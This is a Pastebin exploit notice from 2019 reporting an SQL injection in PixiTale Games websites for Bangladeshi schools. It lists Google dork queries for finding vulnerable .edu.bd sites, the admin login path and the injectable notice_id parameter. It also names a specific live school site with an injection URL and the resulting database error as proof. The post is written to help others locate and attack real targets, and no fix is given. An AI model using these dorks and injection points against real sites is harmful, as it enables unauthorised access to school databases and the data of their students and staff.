KingSkrupellos

By Prodigy PixiTale Games Bangladesh Education SQL Injection

Jan 8th, 2019
61
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.81 KB | None | 0 0
  1. ############################################################
  2.  
  3. # Exploit Title : By Prodigy PixiTale Games Bangladesh Education SQL Injection Vulnerability
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 08/01/2019
  7. # Vendor Homepage : pixitale.com
  8. # Tested On : Windows and Linux
  9. # Category : WebApps
  10. # Exploit Risk : Medium
  11. # Google Dorks : intext:''Designed by PIXITALE GAMES.'' site:edu.bd
  12. intext:''By Prodigy. Copyright © PIXITALE GAMES''
  13. intext:''Copyright © 2017 PIXITALE GAMES.
  14. Designed by PIXITALE GAMES. All rights reserved.''
  15. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  16. Special Elements used in an SQL Command ('SQL Injection') ]
  17. CXSecurity Exploit Reference Link :
  18. cxsecurity.com/issue/WLB-2019010053
  19.  
  20. ############################################################
  21.  
  22. # Admin Panel Login Path :
  23. **************************
  24.  
  25. /admin/
  26.  
  27. # SQL Injection Exploit :
  28. **************************
  29.  
  30. /notice.php?notice_id=[SQL Injection]
  31.  
  32. ############################################################
  33.  
  34. # Example Vulnerable Site =>
  35. **************************
  36.  
  37. Note => (192.185.171.2) => There are 46 domains hosted on this server.
  38.  
  39. [+] sjs.edu.bd/notice.php?notice_id=439%27
  40.  
  41. => [ Proof of Concept ] => archive.fo/ePLlF
  42.  
  43. ############################################################
  44.  
  45. # SQL Database Error :
  46. ********************
  47.  
  48. Last query: SELECT * FROM notice WHERE id='439''
  49. Mysql error: You have an error in your SQL syntax;
  50. check the manual that corresponds to your
  51. MySQL server version for the
  52. right syntax to use near ''439''' at line 1
  53.  
  54. ############################################################
  55.  
  56. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  57.  
  58. ############################################################
Add Comment
Please, Sign In to add comment